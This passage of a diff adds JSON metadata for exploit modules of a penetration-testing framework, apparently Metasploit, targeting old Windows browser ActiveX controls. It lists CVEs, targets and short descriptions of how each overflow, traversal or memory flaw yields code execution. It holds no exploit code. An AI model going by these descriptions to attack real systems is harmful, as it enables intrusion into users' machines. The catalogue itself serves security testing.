The\n vulnerability exists in the StopModule() method, where the lModule parameter is\n used to dereference memory to get a function pointer, which leads to code execution\n under the context of the user visiting a malicious web page.", + "references": [ + "CVE-2012-0267", + "OSVDB-78253", + "BID-51374", + "URL-http://web.archive.org/web/20120122095846/http://secunia.com:80/secunia_research/2012-2" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 7 on Windows Vista" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb", + "is_install_path": true, + "ref_name": "windows/browser/ntr_activex_stopmodule", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/oracle_autovue_setmarkupmode": { + "name": "Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow", + "fullname": "exploit/windows/browser/oracle_autovue_setmarkupmode", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-18", + "type": "exploit", + "author": [ + "Brian Gorenc", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.\n The vulnerability, due to the insecure usage of an strcpy like function in the\n SetMarkupMode method, when handling a specially crafted sMarkup argument, allows\n to trigger a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.\n\n The module has been successfully tested against Oracle AutoVue Desktop Version\n 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed to DEP and\n ASLR bypass).", + "references": [ + "CVE-2012-0549", + "BID-53077", + "OSVDB-81439", + 
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05", + "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html", + "URL-https://www.rapid7.com/blog/post/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3 / Windows Vista SP2", + "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2", + "IE 9 with Java 6 on Windows 7 SP1" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb", + "is_install_path": true, + "ref_name": "windows/browser/oracle_autovue_setmarkupmode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/oracle_dc_submittoexpress": { + "name": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/oracle_dc_submittoexpress", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). 
When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-4607", + "OSVDB-38335", + "BID-25467", + "US-CERT-VU-281977" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb", + "is_install_path": true, + "ref_name": "windows/browser/oracle_dc_submittoexpress", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/oracle_webcenter_checkoutandopen": { + "name": "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/oracle_webcenter_checkoutandopen", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-04-16", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in the Oracle WebCenter Content\n CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where\n user controlled input is used to call ShellExecuteExW(). This module abuses the\n control to execute an arbitrary HTA from a remote location. 
This module has been\n tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle\n WebCenter Content 11.1.1.6.0.", + "references": [ + "CVE-2013-1559", + "OSVDB-92386", + "BID-59122", + "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html", + "ZDI-13-094" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb", + "is_install_path": true, + "ref_name": "windows/browser/oracle_webcenter_checkoutandopen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/orbit_connecting": { + "name": "Orbit Downloader Connecting Log Creation Buffer Overflow", + "fullname": "exploit/windows/browser/orbit_connecting", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. 
When an\n attacker serves up a malicious web site, arbitrary code may be executed.\n The PAYLOAD windows/shell_bind_tcp works best.", + "references": [ + "CVE-2009-0187", + "OSVDB-52294", + "BID-33894" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/orbit_connecting.rb", + "is_install_path": true, + "ref_name": "windows/browser/orbit_connecting", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ovftool_format_string": { + "name": "VMWare OVF Tools Format String Vulnerability", + "fullname": "exploit/windows/browser/ovftool_format_string", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-08", + "type": "exploit", + "author": [ + "Jeremy Brown", + "juan vazquez " + ], + "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. 
The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", + "references": [ + "CVE-2012-3569", + "OSVDB-87117", + "BID-56468", + "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VMWare OVF Tools 2.1 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/ovftool_format_string.rb", + "is_install_path": true, + "ref_name": "windows/browser/ovftool_format_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/pcvue_func": { + "name": "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability", + "fullname": "exploit/windows/browser/pcvue_func", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-10-05", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "mr_me ", + "TecR0c " + ], + "description": "This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.\n By setting a dword value for the SaveObject() or LoadObject(), an attacker can\n overwrite a function pointer and execute arbitrary code.", + "references": [ + "CVE-2011-4044", + "OSVDB-77561", + "BID-49795", + "URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer 6 / Internet Explorer 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/pcvue_func.rb", + "is_install_path": true, + "ref_name": "windows/browser/pcvue_func", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/browser/persits_xupload_traversal": { + "name": "Persits XUpload ActiveX MakeHttpRequest Directory Traversal", + "fullname": "exploit/windows/browser/persits_xupload_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-29", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a directory traversal in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n an attacker is able to write arbitrary files to arbitrary locations on disk.\n\n Code execution occurs by writing to the All Users Startup Programs directory.\n You may want to combine this module with the use of exploit/multi/handler since a\n user would have to log for the payload to execute.", + "references": [ + "CVE-2009-3693", + "OSVDB-60001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/persits_xupload_traversal.rb", + "is_install_path": true, + "ref_name": "windows/browser/persits_xupload_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/quickr_qp2_bof": { + "name": "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/quickr_qp2_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-23", + "type": "exploit", + "author": [ + "Gaurav Baruah", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. 
The affected ActiveX is\n provided by the qp2.dll installed with the IBM Lotus Quickr product.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module\n msvcr71.dll is used. This one is installed with the qp2 ActiveX.", + "references": [ + "CVE-2012-2176", + "OSVDB-82166", + "BID-53678", + "ZDI-12-134", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/quickr_qp2_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/quickr_qp2_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/real_arcade_installerdlg": { + "name": "Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution", + "fullname": "exploit/windows/browser/real_arcade_installerdlg", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-03", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. 
The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.", + "references": [ + "OSVDB-71559", + "EDB-17105" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb", + "is_install_path": true, + "ref_name": "windows/browser/real_arcade_installerdlg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_cdda_uri": { + "name": "RealNetworks RealPlayer CDDA URI Initialization Vulnerability", + "fullname": "exploit/windows/browser/realplayer_cdda_uri", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-11-15", + "type": "exploit", + "author": [ + "bannedit ", + "sinn3r " + ], + "description": "This module exploits an initialization flaw within RealPlayer 11/11.1 and\n RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n initialization failure. 
However, this failure is improperly handled and\n uninitialized memory executed.", + "references": [ + "CVE-2010-3747", + "OSVDB-68673", + "BID-44144", + "ZDI-10-210", + "URL-http://service.real.com/realplayer/security/10152010_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "RealPlayer SP 1.0 - 1.1.4 Universal", + "RealPlayer 11.0 - 11.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_cdda_uri.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_cdda_uri", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_console": { + "name": "RealPlayer rmoc3260.dll ActiveX Control Heap Corruption", + "fullname": "exploit/windows/browser/realplayer_console", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-03-08", + "type": "exploit", + "author": [ + "Elazar Broad " + ], + "description": "This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n By sending a specially crafted string to the 'Console' property\n in the rmoc3260.dll control, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-1309", + "OSVDB-42946", + "BID-28157", + "URL-http://web.archive.org/web/20080313103656/http://secunia.com:80/advisories/29315/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/realplayer_console.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_console", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_import": { + "name": "RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow", + "fullname": "exploit/windows/browser/realplayer_import", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-10-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-5601", + "OSVDB-41430", + "BID-26130" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE / RealOne Player 2 (6.0.11.853)", + "IE / RealPlayer 10.5 (6.0.12.1483)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_import.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_import", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_qcp": { + "name": "RealNetworks Realplayer QCP Parsing Heap Overflow", + "fullname": "exploit/windows/browser/realplayer_qcp", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-08-16", + "type": "exploit", + "author": [ + "Sean de Regge", + "juan vazquez " + ], + "description": "This module exploits a heap overflow in Realplayer when handling a .QCP file.\n The specific flaw exists within qcpfformat.dll. 
A static 256 byte buffer is\n allocated on the heap and user-supplied data from the file is copied within a\n memory copy loop.\n\n This allows a remote attacker to execute arbitrary code running in the context\n of the web browser via a .QCP file with a specially crafted \"fmt\" chunk.\n At this moment this module exploits the flaw on Windows XP IE6, IE7.", + "references": [ + "CVE-2011-2950", + "OSVDB-74549", + "BID-49172", + "ZDI-11-265", + "URL-http://service.real.com/realplayer/security/08162011_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6 on XP SP3", + "Internet Explorer 7 on XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_qcp.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_qcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_smil": { + "name": "RealNetworks RealPlayer SMIL Buffer Overflow", + "fullname": "exploit/windows/browser/realplayer_smil", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-03-01", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.", + "references": [ + "CVE-2005-0455", + "OSVDB-14305", + "BID-12698" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "RealPlayer 10/8 on Windows 2000 SP0-SP4 
English", + "RealPlayer 10/8 on Windows XP PRO SP0-SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_smil.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_smil", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/roxio_cineplayer": { + "name": "Roxio CinePlayer ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/roxio_cineplayer", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-04-11", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n By setting an overly long value to 'DiskType', an attacker can overrun\n a buffer and execute arbitrary code.", + "references": [ + "CVE-2007-1559", + "OSVDB-34779", + "BID-23412" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/roxio_cineplayer.rb", + "is_install_path": true, + "ref_name": "windows/browser/roxio_cineplayer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/safari_xslt_output": { + "name": "Apple Safari Webkit libxslt Arbitrary File Creation", + "fullname": "exploit/windows/browser/safari_xslt_output", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-07-20", + "type": "exploit", + "author": [ + "Nicolas Gregoire" + ], + "description": "This module exploits a file creation vulnerability in the Webkit\n rendering engine. 
It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.", + "references": [ + "CVE-2011-1774", + "OSVDB-74017", + "URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/safari_xslt_output.rb", + "is_install_path": true, + "ref_name": "windows/browser/safari_xslt_output", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/samsung_neti_wiewer_backuptoavi_bof": { + "name": "Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow", + "fullname": "exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed\n with the Samsung NET-i viewer 1.37.\n\n Specifically, when supplying a long string for the fname parameter to the\n BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer\n overflow due to the use of memcpy with an incorrect size, resulting in remote code\n execution under the context of the user.", + "references": [ + "CVE-2012-4333", + "OSVDB-81453", + "BID-53193", + 
"URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/samsung_neti_wiewer_backuptoavi_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/samsung_security_manager_put": { + "name": "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution", + "fullname": "exploit/windows/browser/samsung_security_manager_put", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-08-05", + "type": "exploit", + "author": [ + "mr_me " + ], + "description": "This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481\n by exploiting the vulnerability against the client-side. This exploit has been tested successfully using\n IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. 
Finally\n a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.", + "references": [ + "URL-http://www.zerodayinitiative.com/advisories/ZDI-15-156/", + "URL-http://www.zerodayinitiative.com/advisories/ZDI-16-481/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Samsung Security Manager 1.32 & 1.4 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/samsung_security_manager_put.rb", + "is_install_path": true, + "ref_name": "windows/browser/samsung_security_manager_put", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/sapgui_saveviewtosessionfile": { + "name": "SAP AG SAPgui EAI WebViewer3D Buffer Overflow", + "fullname": "exploit/windows/browser/sapgui_saveviewtosessionfile", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-03-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n with SAPgui. 
When passing an overly long string the SaveViewToSessionFile()\n method, arbitrary code may be executed.", + "references": [ + "CVE-2007-4475", + "OSVDB-53066", + "US-CERT-VU-985449" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb", + "is_install_path": true, + "ref_name": "windows/browser/sapgui_saveviewtosessionfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/siemens_solid_edge_selistctrlx": { + "name": "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/siemens_solid_edge_selistctrlx", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-26", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.\n The vulnerability exists on several APIs provided by the control, where user supplied input\n is handled as a memory pointer without proper validation, allowing an attacker to read and\n corrupt memory from the target process. 
This module abuses the methods NumChildren() and\n DeleteItem() in order to achieve memory info leak and remote code execution respectively.\n This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,\n using Solid Edge 10.4.", + "references": [ + "OSVDB-93696", + "EDB-25712" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb", + "is_install_path": true, + "ref_name": "windows/browser/siemens_solid_edge_selistctrlx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/softartisans_getdrivename": { + "name": "SoftArtisans XFile FileManager ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/softartisans_getdrivename", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-08-25", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n (SAFmgPwd.dll 2.0.5.3). 
When sending an overly long string to the GetDriveName() method\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-1682", + "OSVDB-47794", + "US-CERT-VU-914785", + "BID-30826" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/softartisans_getdrivename.rb", + "is_install_path": true, + "ref_name": "windows/browser/softartisans_getdrivename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/sonicwall_addrouteentry": { + "name": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/sonicwall_addrouteentry", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-11-01", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-5603", + "OSVDB-39069", + "URL-http://www.sec-consult.com/303.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 6 / Windows XP SP2 Pro English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/sonicwall_addrouteentry.rb", + "is_install_path": true, + "ref_name": "windows/browser/sonicwall_addrouteentry", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/browser/symantec_altirisdeployment_downloadandinstall": { + "name": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute", + "fullname": "exploit/windows/browser/symantec_altirisdeployment_downloadandinstall", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows remote attackers to install and execute arbitrary files on a users file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.", + "references": [ + "BID-36346", + "CVE-2009-3028", + "OSVDB-57893" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb", + "is_install_path": true, + "ref_name": "windows/browser/symantec_altirisdeployment_downloadandinstall", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/symantec_altirisdeployment_runcmd": { + "name": "Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/symantec_altirisdeployment_runcmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n When sending an overly long string to RunCmd() method of\n AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2009-3033", + "BID-37092", + "OSVDB-60496" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + 
